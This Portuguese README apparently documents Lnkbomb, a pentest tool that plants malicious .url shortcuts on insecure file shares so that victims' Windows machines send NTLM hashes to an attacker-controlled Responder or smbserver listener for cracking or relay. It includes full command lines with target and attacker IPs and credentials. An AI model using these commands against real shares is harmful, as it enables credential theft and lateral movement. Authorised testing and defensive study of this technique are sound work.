
Gerador de atalhos maliciosos para coletar hashes NTLM de compartilhamentos de arquivos inseguros.
O Lnkbomb é usado para carregar arquivos de atalho maliciosos em compartilhamentos de arquivos inseguros. A vulnerabilidade existe porque o Windows procura um arquivo de ícone para associar ao arquivo de atalho. Esse arquivo de ícone pode ser direcionado para a máquina de um testador de penetração que esteja executando o Responder ou smbserver para coletar hashes NTLMv1 ou NTLMv2 (dependendo da configuração da máquina vítima). O testador pode então tentar quebrar esses hashes coletados offline com uma ferramenta como Hashcat, ou retransmiti-los para uma ferramenta como ntlmrelayx para exploração adicional.
O arquivo de payload é carregado diretamente no arquivo inseguro especificado pelo testador na linha de comando. O testador também inclui seu endereço IP, que é escrito no payload.
A versão 2.0 é uma reconstrução total da ferramenta e utiliza a biblioteca pysmb, permitindo a entrega de payloads não autenticados e autenticados.
Instalando o Lnkbomb
Observe que o projeto funciona de forma consistente no Windows. Pode apresentar problemas no Linux.
git clone https://github.com/dievus/lnkbomb.git
Mude para o diretório lnkbomb e execute:
python3 lnkbomb.py -h
Isso exibirá o menu de ajuda, que contém as seguintes flags:
-h, --help - Lists the help options
-t, --target - Specifies the target IP address
-a, --attacker - Specifies the tester's attack machine IP address
-r, --recover - Used to remove the payload when testing is completed (ex. -r payloadname.url)
-w, --windows - New command - required for setting appropriate ports for Windows shares
-l, --linux - New command - required for setting appropriate ports for Linux shares
-n, --netbios - New command - netbios name for targeted Windows machines must be included
Exemplos de comandos completos incluem:
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows
python3 .\lnkbomb.py -t 192.168.1.79 -a 192.168.1.21 -s Shared -u themayor -p Password123! -n dc01 --windows -r dicnwdsebl.url
Você precisará utilizar uma ferramenta como Responder ou smbserver para capturar o hash NTLM.
responder -I eth0 -dwFP -v
ou
smbserver.py . . -smb2support
Lembre-se de que esta ferramenta é destinada apenas a fins de hacking ético e testes de penetração. Não aprovo nenhum comportamento que envolva testar alvos para os quais você não tenha permissão atual para testar.
Esta ferramenta pode ou não funcionar dependendo da aplicação de patches e versão do alvo. A experiência do usuário pode variar.
Sei que são atalhos .url e não extensões .lnk. Faço isso para te provocar.